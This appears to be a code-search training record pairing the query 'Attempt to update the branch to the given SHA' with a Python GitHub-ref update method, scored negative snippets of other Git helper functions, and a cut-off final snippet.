[ "0.8263331", "0.77891356", "0.76186675", "0.72726834", "0.71636385", "0.7043409", "0.69660765", "0.6948939", "0.6918359", "0.6828066", "0.6820213", "0.6789778", "0.67066014", "0.660529", "0.66019213", "0.65866226", "0.6435828", "0.6376282", "0.62368584", "0.62368584", "0.6212842", "0.6053773", "0.60523766", "0.5988234", "0.5987599", "0.59790695", "0.5945354", "0.59414065", "0.5938403", "0.59379387", "0.5908007", "0.585037", "0.58284605", "0.58164334", "0.5800554", "0.57933253", "0.5790158", "0.5788148", "0.57708186", "0.57387066", "0.5707968", "0.5704753", "0.5655177", "0.56504893", "0.5620868", "0.5599651", "0.55568093", "0.5518143", "0.54830134", "0.5481074", "0.5477548", "0.54754263", "0.54537755", "0.54537755", "0.54406846", "0.5439406", "0.54245406", "0.54170126", "0.54108685", "0.5400375", "0.53946465", "0.53772515", "0.537645", "0.5370509", "0.5356602", "0.5352776", "0.5309672", "0.52978355", "0.5292055", "0.52798057", "0.52618307", "0.52587634", "0.5248471", "0.5234938", "0.52349156", "0.52248687", "0.51990026", "0.519074", "0.5174066", "0.51575243", "0.5152781", "0.5149605", "0.514363", "0.51392525", "0.51303333", "0.5126925", "0.5122555", "0.5119889", "0.51183736", "0.51168424", "0.51131445", "0.51131445", "0.51131445", "0.50965273", "0.50960267", "0.50928015", "0.50907534", "0.5079079", "0.5073764", "0.5072663" ]
0.6839864
9
Attempt to update the branch to the given SHA.
def update_branch(self, name, sha):
    branch_info = {
        'sha': sha,
    }
    resp = self.patch('git/refs/heads/{}'.format(name), json=branch_info)
    try:
        resp.raise_for_status()
    except Exception:
        logger.error(resp.json())
        raise
    return resp.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_latest_branch (product, which, main_branch):\n\n name = \"Latest_ACE7TAO3_\" + which\n\n vprint ('Fast-forwarding', name, 'to', main_branch)\n ex (\"cd $DOC_ROOT/\" + product + \" && git fetch . \" + main_branch + \":\" + name)", "def update(self, branch=None):\n if branch is None:\n branch = self.branch\n\n print \"*** Updating to branch '%s'\" % branch\n commands.pull(ui.ui(), self._repository, self.url)\n commands.update(ui.ui(), self._repository, None, branch, True)", "def update(self, rev = 'HEAD'):\r\n self._authsvn('up', ['-r', rev])", "def update(repository, args, **_):\n _log(repository, 'INFO', \"Going to build commit %s\" % args[2][:7])", "def reset_branch(ctx, name, sha, hard):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo(\"Updating {} branch...\".format(name), break_line=False)\n gh.reset_branch(name=name, sha=sha, hard=hard)\n log.echo('Branch {} is now at {} '.format(name, sha), break_line=False)\n log.checkmark()\n except BaseException as _:\n log.xmark()\n raise", "def update():\n call('git -C ~/norminette+ pull', shell=True)", "def verify_up_to_date(path, branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch up to date:\")\n run_in_component(path, ['git', 'remote', 'update'])\n\n result = run_in_component(path, ['git', 'rev-list', 'HEAD...origin/%s' % branch, '--count'])\n count = int(result.strip())\n\n if count == 0:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You branch is not up-to-date with remote branch: %d different commits\" % count)", "def update(context, user=get_local_user(), remote=False, instance=None, branch=BRANCH):\n no_stack = None\n no_compose = False\n\n command = f\"git checkout {branch} || git pull && git checkout {branch}\"\n run_command(context, user, remote, instance, no_stack, command, no_compose)\n\n command = \"git pull\"\n run_command(context, user, remote, instance, no_stack, command, no_compose)", "def update_stable(path, sha_list, origin):\n\n conn = sqlite3.connect(rebasedb)\n c = conn.cursor()\n\n cmd = ['git', '-C', path, 'log', '--no-merges', '--abbrev=12', '--oneline',\n '--reverse', sha_list]\n commits = subprocess.check_output(cmd, encoding='utf-8', errors='ignore')\n\n for commit in commits.splitlines():\n if commit != '':\n elem = commit.split(' ')[:1]\n sha = elem[0]\n c.execute(\"select sha from stable where sha is '%s'\" % sha)\n found = c.fetchall()\n if found == []:\n c.execute('INSERT INTO stable(sha, origin) VALUES (?, ?)', (\n sha,\n origin,\n ))\n\n conn.commit()\n conn.close()", "def update_from_repo():\n\treturn", "def update_base_branch(self):\n # Make sure base branch is up to date\n print(\"Checking out base branch '{}'...\".format(self.base_branch))\n self.git.checkout(self.base_branch)\n print('Updating base branch...')\n self.git.pull('--rebase')", "def sha(self, sha):\n\n self._sha = sha", "def update_version():\n version = os.environ.get('TRAVIS_COMMIT', None) or \\\n subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD'])\n version_file = path.join('slingsby', 'VERSION')\n with open(version_file, 'w') as fh:\n fh.write(version)", "def set_git_sha(context, sha):\n context.sha = sha", "def update_repo_cli(api_client, repo_id, branch, tag, path):\n id_from_param_or_path = (repo_id if repo_id is not None\n else ReposApi(api_client).get_repo_id(path))\n content = ReposApi(api_client).update(id_from_param_or_path, branch, tag)\n click.echo(pretty_format(content))", "def pull_nightly_version(spdir):\n nightly_version = _nightly_version(spdir)\n cmd = 
[\"git\", \"merge\", nightly_version]\n p = subprocess.run(cmd, check=True)", "def push_latest_branch (product, which, main_branch):\n\n name = \"Latest_ACE7TAO3_\" + which\n\n if opts.push:\n vprint (\"Pushing branch\", name)\n ex (\"cd $DOC_ROOT/\" + product + \" && git push origin refs/heads/\" + name,\n allow_fail=True)", "def update(dest, branch=None, revision=None):\n # If we have a revision, switch to that\n if revision is not None:\n cmd = ['hg', 'update', '-C', '-r', revision]\n run_cmd(cmd, cwd=dest)\n else:\n # Check & switch branch\n local_branch = get_output(['hg', 'branch'], cwd=dest).strip()\n\n cmd = ['hg', 'update', '-C']\n\n # If this is different, checkout the other branch\n if branch and branch != local_branch:\n cmd.append(branch)\n\n run_cmd(cmd, cwd=dest)\n return get_revision(dest)", "def checkout_nightly_version(branch, spdir):\n nightly_version = _nightly_version(spdir)\n cmd = [\"git\", \"checkout\", \"-b\", branch, nightly_version]\n p = subprocess.run(cmd, check=True)", "def update_branch(branch, repo, options):\n update = None\n\n remote = repo.get_merge_branch(branch)\n if not remote:\n gbp.log.warn(\"No branch tracking '%s' found - skipping.\" % branch)\n return False\n\n can_fast_forward, up_to_date = repo.is_fast_forward(branch, remote)\n\n if up_to_date: # Great, we're done\n gbp.log.info(\"Branch '%s' is already up to date.\" % branch)\n return True\n\n if can_fast_forward:\n update = 'merge'\n else:\n if options.force == 'merge':\n gbp.log.info(\"Non-fast forwarding '%s' due to --force=merge\" % branch)\n update = 'merge'\n elif options.force == 'clean':\n gbp.log.info(\"Checking out clean copy of '%s' due to --force=clean\" % branch)\n update = 'clean'\n else:\n gbp.log.warn(\"Skipping non-fast forward of '%s' - use --force or \"\n \"update manually\" % branch)\n\n if update:\n gbp.log.info(\"Updating '%s'\" % branch)\n if repo.branch == branch:\n if update == 'merge':\n repo.merge(remote)\n elif update == 'clean':\n # Have to drop our current branch\n tmpbranch = \"_gbptmp-\"+branch\n gbp.log.debug(\"Checking out '%s' to '%s'\" % (remote, tmpbranch))\n repo.create_branch(tmpbranch, remote)\n gbp.log.debug(\"Switching current branch to '%s'\" % (tmpbranch))\n repo.set_branch(tmpbranch)\n gbp.log.debug(\"Dropping branch '%s'\" % branch)\n repo.delete_branch(branch)\n gbp.log.info(\"Renaming branch '%s' to '%s'\" % (tmpbranch, branch))\n repo.rename_branch(tmpbranch, branch)\n else:\n if can_fast_forward or (update == 'clean'):\n sha1 = repo.rev_parse(remote)\n repo.update_ref(\"refs/heads/%s\" % branch, sha1,\n msg=\"gbp: forward %s to %s\" % (branch, remote))\n elif update == 'merge':\n # Merge other branch, if it cannot be fast-forwarded\n current_branch=repo.branch\n repo.set_branch(branch)\n repo.merge(remote)\n repo.set_branch(current_branch)\n\n return (update != None)", "def update_changelog(package_id: str, base_branch: str, verbose: bool):\n if _update_changelog(package_id, base_branch, verbose, True):\n sys.exit(64)", "def update_ref(ref, value):\n subprocess.check_call([\"git\", \"update-ref\", ref, value])", "def sha(location, rev):\n ensure_dir(location)\n with utils.cd(location):\n cmd = '/usr/bin/git rev-parse --verify {}'.format(rev)\n return subprocess.check_output(cmd, shell=True).strip()", "def bump_upstream_repos_shas(path):\n filelist = find_yaml_files(path)\n for filename in filelist:\n print(\"Working on %s\" % filename)\n bump_upstream_repos_sha_file(filename)", "def git_update(path: Path, repo: str, tag: str = None):\n GITEXE = 
shutil.which(\"git\")\n\n if not GITEXE:\n logging.error(\"Git not available.\")\n return\n\n if path.is_dir():\n subprocess.check_call([GITEXE, \"-C\", str(path), \"pull\"])\n else:\n # shallow clone\n if tag:\n subprocess.check_call(\n [\n GITEXE,\n \"clone\",\n repo,\n \"--depth\",\n \"1\",\n \"--branch\",\n tag,\n \"--single-branch\",\n str(path),\n ]\n )\n else:\n subprocess.check_call([GITEXE, \"clone\", repo, \"--depth\", \"1\", str(path)])", "def _update_head(self, index_entry, branch, new_id):\r\n index_entry['versions'][branch] = new_id\r\n self.db_connection.update_course_index(index_entry)", "def checkout_latest():\n with cd(env.repo_path):\n run('git checkout %(branch)s;' % env)\n run('git pull origin %(branch)s' % env)", "def commit(self, sha):\r\n return repocommits.RepoCommit(self, sha)", "def main(branch):\n try:\n # Ensure that we're in a git repository. This command is silent unless\n # you're not actually in a git repository, in which case, you receive a\n # \"Not a git repository\" error message.\n output = subprocess.check_output(['git', 'rev-parse']).decode('utf-8')\n sys.stdout.write(output)\n except subprocess.CalledProcessError:\n # Bail if we're not in a git repository.\n return\n\n # This behavior ensures a better user experience for those that aren't\n # intimately familiar with git.\n ensure_remote_branch_is_tracked(branch)\n\n # Switch to the specified branch and update it.\n subprocess.check_call(['git', 'checkout', '--quiet', branch])\n\n # Pulling is always safe here, because we never commit to this branch.\n subprocess.check_call(['git', 'pull', '--quiet'])\n\n # Checkout the top commit in the branch, effectively going \"untracked.\"\n subprocess.check_call(['git', 'checkout', '--quiet', '%s~0' % branch])\n\n # Clean up the repository of Python cruft. Because we've just switched\n # branches and compiled Python files should not be version controlled,\n # there are likely leftover compiled Python files sitting on disk which may\n # confuse some tools, such as sqlalchemy-migrate.\n subprocess.check_call(['find', '.', '-name', '\"*.pyc\"', '-delete'])\n\n # For the sake of user experience, give some familiar output.\n print('Your branch is up to date with branch \\'origin/%s\\'.' % branch)", "def bump_version(ctx, branch, semantic):\n\n try:\n log.echo('Bumping version...', break_line=False)\n bump = ctx.obj.github.bump_version(branch=branch, semantic=semantic)\n log.checkmark()\n log.echo('Bumped version from {} to {}'.format(bump.prev_version, bump.next_version))\n except BaseException as _:\n log.xmark()\n raise", "async def update(\n app: AppIdentity,\n repo: str,\n id: str,\n name: str,\n):\n repo = RepoName.parse(repo)\n\n action = checks.UpdateRun(\n owner=repo.owner,\n repo=repo.repo,\n run=checks.RunDetails(\n id=id,\n name=name,\n status=checks.Status.in_progress,\n ))\n\n async with aiohttp.ClientSession(\n headers=await app.installation_headers(repo.owner)) as sesh:\n\n async with action.execute(sesh) as resp:\n logging.debug(resp)\n\n try:\n resp.raise_for_status()\n except Exception:\n logging.exception((await resp.json())[\"message\"])\n raise\n\n print(await resp.json())", "def checkForUpdates(self):\n\t\t# Get a definite yes or no answer from the user.\n\t\tinput = \"\"\n\t\twhile input != \"y\" and input != \"yes\" and input != \"n\" and input != \"no\":\n\t\t\tprint(\" Download the latest version of hnsh? 
(y/n)\")\n\t\t\tinput = raw_input(\"> \")\n\t\t\n\t\tif input == \"y\" or input == \"yes\":\n\t\t\tprint \"\\n Downloading the latest version from GitHub repository...\"\n\t\t\tserverFile = urllib.urlretrieve(\"http://github.com/scottjacksonx/hnsh/zipball/master\", \"hnsh_latest.zip\", quickProgressBar)\n\t\t\tslash = \"/\"\n\t\t\tif sys.platform == \"win32\":\n\t\t\t\tslash = \"\\\\\"\n\t\t\tif os.path.isfile(\"hnsh_latest.zip\"):\n\t\t\t\tprint \"\"\n\t\t\t\tprint \" The latest version of hnsh has been downloaded as:\"\n\t\t\t\tprint \" \" + sys.path[0] + slash + \"hnsh_latest.zip.\"\n\t\t\t\tprint \"\"\n\t\t\t\tprint \" Would you like to apply the update? (y/n)\"\n\t\t\t\tif raw_input(\"> \") == (\"y\" or \"yes\" or \"Y\"):\n\t\t\t\t\tprint \"\\n> Attempting to apply update ...\"\n\t\t\t\t\tupdateZip = zipfile.ZipFile(sys.path[0] + slash + \"hnsh_latest.zip\", \"r\")\n\t\t\t\t\tfor name in updateZip.namelist():\n\t\t\t\t\t\tif (updateZip.getinfo(name).file_size > 0):\n\t\t\t\t\t\t\tupdateZip.extract(name)\n\t\t\t\t\t\t\tshutil.copy(sys.path[0] + slash + name, sys.path[0] + slash + (name.rpartition(\"/\")[2]))\n\t\t\t\t\t\t\tprint \" \", name, updateZip.getinfo(name).file_size, \"bytes\"\n\t\t\t\t\t\t\tos.remove(sys.path[0] + slash + name)\n\t\t\t\t\tos.remove(sys.path[0] + slash + \"hnsh_latest.zip\")\n\t\t\t\t\tos.rmdir(sys.path[0] + slash + name.rpartition(\"/\")[0])\n\t\t\t\telse:\n\t\t\t\t\tprint \"\\n> Download finished! Press enter to exit so you can manually update the files.\"\n\t\t\telse:\n\t\t\t\tprint \"Error trying to update automatically. To update manually, go to http://github.com/scottjacksonx/hnsh and download the latest version of hnsh.\"\n\t\t\tinput = raw_input(\"\\n> Done! Now press enter and re-run this program to use the new version.\")\n\t\t\tself.quit = 1\n\t\telse:\n\t\t\tinput = raw_input(\"Press Return to go back to stories.\")\n\t\t\tself.printStories()", "def check_fast_forward(self, branch):\n proc = run_cmd(self.git + ['rev-list', '%s-tmp..%s' %\n (branch, branch), '--'])\n if proc.stdout.strip():\n # Commits have been made on the main branch since the last update\n # command.\n raise EmtError('cannot fast-forward the %s branch, please '\n 'run again the update command' % branch)", "def update(self):\n resp = yield self.client.request(\n \"{}/pulls/{}\".format(self.repo.base_path, self.num),\n params={\n \"title\": self.title,\n \"body\": self.body,\n \"state\": self.state,\n \"base\": self.base,\n \"maintainer_can_modify\": self.maintainer_can_modify,\n }, method=\"PATCH\")\n self.c = resp.data\n self.after_sync()\n raise gen.Return(self)", "def update_mirror(self, repo, body):\n url = self._repo_url(repo, other='/mirror')\n response = self.rest.put(url)\n\n if response.status_code is not 200:\n self.module.fail_json(msg=response.info)\n return response.info", "def update(self, path):\n # pylint: disable=E1101\n # E1101: pylint could not resolve the depth attribute.\n \n self._sharedState.lock.acquire()\n try:\n try:\n self._client.cleanup(self.workingCopyPath)\n self._client.revert(self._workingCopyPath + path, True)\n self._client.update(self._workingCopyPath + path, depth=pysvn.depth.infinity )\n except ClientError, error:\n raise SubversionError(error)\n finally:\n self._sharedState.lock.release()", "def update_rc_branch(ctx, mainline, rc):\n repo = ctx.obj\n rc = try_context(repo, rc, \"rc\", \"rc_ref\")\n\n if mainline == rc:\n raise ValueError(\"Specifying the same branch for mainline and rc\"\n \" will result in dataloss. 
The mainline branch\"\n \" will be deleted, then the rc branch will be\"\n \" created from the now non-existent mainline branch\")\n\n branch_protection_enabled = False\n\n # check if branch exists\n if rc in (b.name for b in repo.iter_branches()):\n logging.debug(\"Branch {} exists\".format(rc))\n # rc branch exists\n branch_protection_response = branch_api_request(repo, rc, 'GET')\n if branch_protection_response.status_code == 200:\n # rc branch exists and protection enabled\n logging.debug(\"Branch {branch} has protection enabled,\"\n \" config: {bp_config}\"\n .format(branch=rc,\n bp_config=branch_protection_response.json()))\n branch_protection_enabled = True\n # disable branch protection\n r = branch_api_request(repo, rc, 'DELETE')\n r.raise_for_status()\n logging.debug(\"Branch protection disabled\")\n elif branch_protection_response.status_code == 404:\n # rc branch exists without protection, so it doesn't need\n # to be disabled\n # TODO: create jira issue about unprotected branch?\n pass\n else:\n # failure retrieving branch protection status\n branch_protection_response.raise_for_status()\n\n # Delete branch\n r = repo._session.request(\n 'DELETE',\n repo.git_refs_urlt.expand(sha=\"heads/{}\".format(rc)))\n r.raise_for_status()\n logging.debug(\"Branch {} deleted\".format(rc))\n\n mainline_sha = repo.branch(mainline).commit.sha\n logging.debug(\"Mainline SHA: {}\".format(mainline_sha))\n\n # create rc branch pointing at head of mainline\n repo.create_ref(\"refs/heads/{}\".format(rc), mainline_sha)\n logging.debug(\"Branch {} created\".format(rc))\n\n # Skeleton branch protection data, used to protect a new branch.\n protection_data = {\n \"required_status_checks\": None,\n \"enforce_admins\": True,\n \"required_pull_request_reviews\": {\n \"dismissal_restrictions\": {},\n \"dismiss_stale_reviews\": False,\n \"require_code_owner_reviews\": False\n },\n \"restrictions\": None\n }\n\n # Incorporate previous branch protection data if the branch was\n # protected perviously\n if branch_protection_enabled:\n stored_bpd = branch_protection_response.json()\n protection_data.update(stored_bpd)\n # The github api returns enforce_admins as dict, but requires it to\n # be sent as a bool.\n protection_data['enforce_admins'] \\\n = stored_bpd['enforce_admins']['enabled']\n\n # Enable branch protection\n r = branch_api_request(repo, rc, 'PUT',\n data=json.dumps(protection_data))\n r.raise_for_status()\n logging.debug(\"Branch Protection enabled for branch {}\".format(rc))\n\n # Ensure the rc branch was not updated to anything else while it was\n # unprotected. 
Stored mainline_sha is used incase mainline has\n # moved on since the SHA was acquired.\n assert mainline_sha == repo.branch(rc).commit.sha\n logging.debug(\"rc branch update complete\")", "def clone_or_update(self,\n repo_url: str,\n repo_dir: str,\n branch: str = \"\",\n depth: str = \"\"):\n if os.path.exists(repo_dir):\n return self.update(repo_dir, branch=branch)\n\n update_to_latest_tag = False\n if branch == \"latest_tag\":\n branch = \"\"\n update_to_latest_tag = True\n p = self.clone(repo_url, repo_dir, branch=branch, depth=depth)\n if not update_to_latest_tag:\n return p\n return self.update(repo_dir, branch=\"latest_tag\")", "def checkout(revision):\n subprocess.run(\n ['git', 'checkout', revision],\n check=True\n )", "def ensure_sync_master_branch(self):\n # TODO(robertocn): Investigate what causes the states mentioned in the\n # docstring in the first place.\n self.api.m.git('update-ref', 'refs/heads/master',\n 'refs/remotes/origin/master')\n self.api.m.git('checkout', 'master', cwd=self.api.m.path['checkout'])", "def _update_head(self, course_key, index_entry, branch, new_id):\n if not isinstance(new_id, ObjectId):\n raise TypeError(f'new_id must be an ObjectId, but is {new_id!r}')\n index_entry['versions'][branch] = new_id\n self.update_course_index(course_key, index_entry)", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def fetch(path):\n LOGGER.info('Post push request received, Updating %s', path)\n call(['cd \"' + path + '\" && git fetch'], shell=True)", "def pull(ctx, path_base):\n with ctx.cd(path_base):\n ctx.run('git reset --hard')\n ctx.run('git pull origin master')", "async def trigger_build(self, *, branch=None, message=None):", "def update(self, rev=None, clean=False, check=False, date=None):\n\n if clean and check:\n raise ValueError('clean and check cannot both be True')\n if rev is not None and date is not None:\n raise ValueError('you cannot specify both rev and date')\n\n rev = self._map_one_rev(rev)\n\n out = self._client.execute('update', r=rev, C=clean, c=check, 
d=date)\n\n return tuple([int(x) for x in self._UPDATE_RESULT_RE.findall(out)])", "def _stash_and_checkout(repo, version):\n repo.git.stash()\n repo.git.checkout(version)\n repo.git.clean(\"-df\")", "def updateBuildArea(self):\r\n\r\n self.initializeBuildArea()\r\n\r\n for obj in self.config[\"repos\"]:\r\n if \"branch\" in obj:\r\n self.gitCheckoutBranch(obj[\"path\"], obj[\"branch\"])\r\n elif \"rev\" in obj:\r\n self.gitCheckoutRevision(obj[\"path\"], obj[\"rev\"])", "def new_commits(repo, sha):\n from datetime import datetime\n\n dateformat = \"%a, %d %b %Y %H:%M:%S GMT\"\n release_commit = repo.get_commit(sha)\n since = datetime.strptime(release_commit.last_modified, dateformat)\n commits = repo.get_commits(since=since)\n if len(list(commits)) == 1:\n return False\n return reversed(list(commits)[:-1])", "def pull_changes():\n\n check_prompt = (\n not env.prompt or\n console.confirm(\n \"Switch to appropriate branch and pull changes from upstream?\",\n default=True,\n )\n )\n\n if check_prompt:\n with cd(env.repo_path):\n run(\"git checkout %s\" % env.branch)\n run(\"git pull\")", "def git_update(c):\n c.run('git submodule update --recursive --remote')", "def run(self):\n USER.info('%s: Checking For Updates', self.recipe.name)\n cur_hash = pakit.conf.IDB[self.recipe.name]['hash']\n if cur_hash == self.recipe.repo.src_hash:\n return\n\n try:\n self.save_old_install()\n InstallTask(self.recipe).run()\n USER.info('%s: Deleting Old Install', self.recipe.name)\n Command('rm -rf ' + self.back_dir).wait()\n except Exception as exc: # pylint: disable=broad-except\n logging.error(exc)\n self.restore_old_install()", "def check_for_update():\n\n # get most recent commit\n r = requests.get('https://api.github.com/repos/PokeMiners/game_masters/git/refs/heads/master')\n\n with open('forms.json', 'r') as f:\n forms = json.load(f)\n last_commit = forms['commit']\n\n # check if most recent commit is the same as the commit of the last downloaded game_master\n if r.status_code == 200:\n latest = json.loads(r.text)\n recent_commit = latest['object']['sha']\n if recent_commit == last_commit:\n return False\n\n print('New version of game_master found')\n r = requests.get('https://raw.githubusercontent.com/PokeMiners/game_masters/master/latest/latest.json')\n if r.status_code != 200:\n print('Couldn\\'t access latest game_master (did the url change?)', file=sys.stderr)\n return False\n \n # save new game_master\n game_master = json.loads(r.text)\n with open('game_master.json', 'w') as f:\n json.dump(game_master, f, indent=4)\n\n # store commit of current game_master\n with open('forms.json', 'w') as f:\n forms['commit'] = recent_commit\n json.dump(forms, f, indent=4)\n\n return True", "def pull(explicit=False):\n repo = git.repo()\n check_detached_head()\n saved_current_branch = repo.current_branch()\n\n commit()\n remote = remote_branch() \n\n # fetch. Dont use pull because we anyway have to local branches two deal\n # with: free and nice\n repo.fetch()\n\n # merge (updated) remote branch into free branch\n free = free_branch() \n if free:\n repo.checkout(free)\n repo.merge(remote)\n\n # rebase nice branch onto (updated) remote branch\n # todo: what if the above pull fails? 
Then the nice_branch is not rebased which leads to troubles later\n # todo: should be done automatically within pull if nice-branch is setuped correctly\n nice = nice_branch() \n if nice:\n repo.checkout(nice)\n repo.rebase(remote)\n\n if explicit:\n repo.checkout(saved_current_branch)", "def pull(self, source=None, update=False, force=False, rev=None,\n bookmark=None, branch=None, ssh=None, remotecmd=None,\n insecure=False, rebase=False, tool=None):\n\n # Normalise the input\n if isinstance(source, Repository):\n source = source.path\n\n rev = self._map_revs(rev)\n \n eh = SimpleErrorHandler()\n out = self._client.execute('pull', source, r=rev, u=update, f=force,\n B=bookmark, b=branch, e=ssh,\n remotecmd=remotecmd,\n insecure=insecure, rebase=rebase, t=tool,\n eh=eh)\n\n if update:\n return tuple([int(x) for x in self._UPDATE_RESULT_RE.findall(out)])\n \n return bool(eh)", "def set_branch(self, value):\n self.update(value)", "def update_commits():\n\n conn = sqlite3.connect(rebasedb)\n c = conn.cursor()\n\n cmd = ['git', '-C', chromeos_path, 'log', '--no-merges', '--abbrev=12',\n '--reverse', '--format=%at%x01%ct%x01%h%x01%an%x01%ae%x01%s',\n rebase_baseline() + '..']\n commits = subprocess.check_output(cmd, encoding='utf-8', errors='ignore')\n\n prevdate = 0\n mprevdate = 0\n for commit in commits.splitlines(): # pylint: disable=too-many-nested-blocks\n if commit != '':\n elem = commit.split('\\001', 5)\n authored = elem[0]\n committed = elem[1]\n sha = elem[2]\n contact = elem[3]\n email = elem[4]\n\n if ('@google.com' not in email and '@chromium.org' not in email\n and '@collabora.com' not in email):\n ncontact, nemail = get_contact(chromeos_path, sha)\n if ncontact:\n contact = ncontact\n email = nemail\n\n subject = elem[5].rstrip('\\n')\n\n ps = subprocess.Popen(['git', '-C', chromeos_path, 'show', sha], stdout=subprocess.PIPE)\n spid = subprocess.check_output(['git', '-C', chromeos_path, 'patch-id'],\n stdin=ps.stdout, encoding='utf-8', errors='ignore')\n patchid = spid.split(' ', 1)[0]\n\n # Make sure date is unique and in ascending order.\n date = int(committed)\n if date == prevdate:\n date = mprevdate + 1\n else:\n prevdate = date\n date = date * 1000\n mprevdate = date\n\n # Do nothing if the sha is already in the commit table.\n c.execute(\"select sha from commits where sha='%s'\" % sha)\n found = c.fetchone()\n if found:\n continue\n\n # check for cherry pick lines. If so, record the upstream SHA associated\n # with this commit. Only look for commits which may be upstream or may\n # have been merged from a stable release.\n usha = ''\n if not chromium.match(subject):\n u = upstream.match(subject)\n desc = subprocess.check_output(['git', '-C', chromeos_path, 'show', '-s', sha],\n encoding='utf-8', errors='ignore')\n for d in desc.splitlines():\n m = None\n if u:\n m = cherrypick.search(d)\n else:\n m = stable.search(d)\n if not m:\n m = stable2.search(d)\n if m:\n usha = m.group(2)[:12]\n # The patch may have been picked multiple times; only record\n # the first entry.\n break\n\n # Search for embedded Change-Id string.\n # If found, add it to database.\n desc = subprocess.check_output(['git', '-C', chromeos_path, 'show', '-s', sha],\n encoding='utf-8', errors='ignore')\n for d in desc.splitlines():\n chid = changeid.match(d)\n if chid:\n chid = chid.group(1)\n break\n\n # Initially assume we'll drop everything because it is not listed when\n # running \"rebase -i\". Before doing that, check if the commit is a\n # stable release commit. 
If so, mark it accordingly.\n reason = 'upstream'\n c.execute(\"select sha from stable where sha is '%s'\" % sha)\n if c.fetchone():\n reason = 'stable'\n\n q = \"\"\"\n INSERT INTO commits(date, created, updated, authored, committed, contact,\n email, sha, usha, patchid, changeid, subject,\n disposition, reason)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n c.execute(q,\n (date, NOW(), NOW(), authored, committed, contact, email,\n sha, usha, patchid, chid, subject, 'drop', reason))\n filenames = subprocess.check_output(\n ['git', '-C', chromeos_path, 'show', '--name-only', '--format=', sha],\n encoding='utf-8', errors='ignore')\n for fn in filenames.splitlines():\n if fn != '':\n c.execute('INSERT INTO files(sha, filename) VALUES (?, ?)',\n (\n sha,\n fn,\n ))\n\n conn.commit()\n\n # \"git cherry -v <target>\" on branch rebase_baseline gives us a list\n # of patches to apply.\n patches = subprocess.check_output(\n ['git', '-C', chromeos_path, 'cherry', '-v', rebase_target_tag()],\n encoding='utf-8', errors='ignore')\n for patch in patches.splitlines():\n elem = patch.split(' ', 2)\n # print(\"patch: \" + patch)\n # print(\"elem[0]: '%s' elem[1]: '%s' elem[2]: '%s'\" % (elem[0], elem[1], elem[2]))\n if elem[0] == '+':\n # patch not found upstream\n sha = elem[1][:12]\n # Try to find patch in stable branch. If it is there, drop it after all.\n # If not, we may need to apply it.\n c.execute(\"select sha, origin from stable where sha is '%s'\" % sha)\n found = c.fetchone()\n if found:\n c.execute(\n \"UPDATE commits SET disposition=('drop') where sha='%s'\" %\n sha)\n c.execute(\"UPDATE commits SET reason=('%s') where sha='%s'\" %\n (found[1], sha))\n c.execute(\"UPDATE commits SET updated=('%d') where sha='%s'\" %\n (NOW(), sha))\n else:\n # We need to check if the commit is already marked as drop\n # with a reason other than \"upstream\". 
If so, don't update it.\n c.execute(\n \"select disposition, reason from commits where sha='%s'\" %\n sha)\n found = c.fetchone()\n if found and found[0] == 'drop' and found[1] == 'upstream':\n c.execute(\n \"UPDATE commits SET disposition=('pick') where sha='%s'\"\n % sha)\n c.execute(\"UPDATE commits SET reason=('') where sha='%s'\" %\n sha)\n c.execute(\n \"UPDATE commits SET updated=('%d') where sha='%s'\" %\n (NOW(), sha))\n\n conn.commit()\n conn.close()", "def apply_patches(ctx, patches, branch, die_on_fail=True):\n ctx.runprocess(['git', 'checkout',\n '%s/%s' % (ctx.config['remote'], branch)])\n for patch in patches:\n print('Applying to %s: %s' % (branch, patch.subject))\n res = ctx.runprocess(\n ['git', 'am', '--3way'],\n stdin_string=''.join(patch.lines),\n check_returncode=0 if die_on_fail else None,\n )\n if not die_on_fail and res.returncode:\n raise RuntimeError(res.stderr)\n sha1 = ctx.runprocess(['git', 'rev-parse', 'HEAD']).stdout.strip()\n if ctx.verbosity:\n print('Resulting hash: %s' % sha1)\n return sha1", "def _set_tracking_branch_commit(self, branch, remote, depth):\n\n branch_output = fmt.ref_string(branch)\n origin = self._remote(remote)\n return_code = self.fetch(remote, depth=depth, ref=branch)\n if return_code != 0:\n raise ClowderGitError(msg=colored(' - Failed to fech', 'red'))\n if not self.existing_local_branch(branch):\n message = colored(' - No local branch ', 'red') + branch_output + '\\n'\n self._print(message)\n self._exit(message)\n if not self.existing_remote_branch(branch, remote):\n message = colored(' - No remote branch ', 'red') + branch_output + '\\n'\n self._print(message)\n self._exit(message)\n local_branch = self.repo.heads[branch]\n remote_branch = origin.refs[branch]\n if local_branch.commit != remote_branch.commit:\n message_1 = colored(' - Existing remote branch ', 'red')\n message_2 = colored(' on different commit', 'red')\n message = message_1 + branch_output + message_2 + 